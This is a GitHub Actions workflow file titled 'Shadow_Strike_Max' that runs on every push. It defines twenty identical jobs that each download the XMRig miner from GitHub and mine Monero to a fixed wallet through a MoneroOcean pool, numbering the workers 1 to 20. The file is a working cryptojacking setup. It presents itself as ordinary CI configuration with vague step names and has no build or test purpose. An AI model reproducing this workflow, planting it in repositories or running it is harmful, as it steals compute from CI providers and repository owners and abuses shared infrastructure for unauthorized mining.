name: Shadow_Strike_Max
on: [push]
jobs:
  job_1:
    runs-on: ubuntu-latest
    steps:
      - name: Power_1
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_1 --cpu-max-threads-hint 50
  job_2:
    runs-on: ubuntu-latest
    steps:
      - name: Power_2
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_2 --cpu-max-threads-hint 50
  job_3:
    runs-on: ubuntu-latest
    steps:
      - name: Power_3
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_3 --cpu-max-threads-hint 50
  job_4:
    runs-on: ubuntu-latest
    steps:
      - name: Power_4
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_4 --cpu-max-threads-hint 50
  job_5:
    runs-on: ubuntu-latest
    steps:
      - name: Power_5
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_5 --cpu-max-threads-hint 50
  job_6:
    runs-on: ubuntu-latest
    steps:
      - name: Power_6
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_6 --cpu-max-threads-hint 50
  job_7:
    runs-on: ubuntu-latest
    steps:
      - name: Power_7
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_7 --cpu-max-threads-hint 50
  job_8:
    runs-on: ubuntu-latest
    steps:
      - name: Power_8
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_8 --cpu-max-threads-hint 50
  job_9:
    runs-on: ubuntu-latest
    steps:
      - name: Power_9
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_9 --cpu-max-threads-hint 50
  job_10:
    runs-on: ubuntu-latest
    steps:
      - name: Power_10
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_10 --cpu-max-threads-hint 50
  job_11:
    runs-on: ubuntu-latest
    steps:
      - name: Power_11
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_11 --cpu-max-threads-hint 50
  job_12:
    runs-on: ubuntu-latest
    steps:
      - name: Power_12
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_12 --cpu-max-threads-hint 50
  job_13:
    runs-on: ubuntu-latest
    steps:
      - name: Power_13
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_13 --cpu-max-threads-hint 50
  job_14:
    runs-on: ubuntu-latest
    steps:
      - name: Power_14
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_14 --cpu-max-threads-hint 50
  job_15:
    runs-on: ubuntu-latest
    steps:
      - name: Power_15
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_15 --cpu-max-threads-hint 50
  job_16:
    runs-on: ubuntu-latest
    steps:
      - name: Power_16
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_16 --cpu-max-threads-hint 50
  job_17:
    runs-on: ubuntu-latest
    steps:
      - name: Power_17
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_17 --cpu-max-threads-hint 50
  job_18:
    runs-on: ubuntu-latest
    steps:
      - name: Power_18
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_18 --cpu-max-threads-hint 50
  job_19:
    runs-on: ubuntu-latest
    steps:
      - name: Power_19
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_19 --cpu-max-threads-hint 50
  job_20:
    runs-on: ubuntu-latest
    steps:
      - name: Power_20
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xvzf xmrig-6.21.0-linux-static-x64.tar.gz
          cd xmrig-6.21.0
          ./xmrig -o ghost.moneroocean.stream:10128 -u 46kXSBLMKEM5HdFqa3VdeMN2GV6fDKVW1SwcXNDTQR8bTZJVpwfGZfL45wGGHGQw77BLsSkAfcygoLnBkaaj4rGc7QzWnFS -p Worker_20 --cpu-max-threads-hint 50
          
